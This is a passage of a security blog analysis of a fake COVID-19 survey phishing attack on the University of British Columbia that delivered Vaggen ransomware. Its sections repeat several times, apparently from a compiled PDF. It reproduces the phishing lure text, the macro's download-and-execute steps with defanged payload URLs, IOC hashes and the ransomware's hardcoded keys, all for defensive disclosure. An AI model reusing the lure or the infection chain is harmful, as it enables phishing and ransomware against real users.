3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1859 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1860 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1861 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1862 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1863 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1864 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1865 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1866 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1867 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1868 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1869 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1870 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1871 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1872 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1873 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1874 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1875 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1876 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1877 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1878 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1879 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1880 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1881 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1882 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1883 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1884 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1885 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1886 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1887 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1888 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1889 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1890 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1891 of 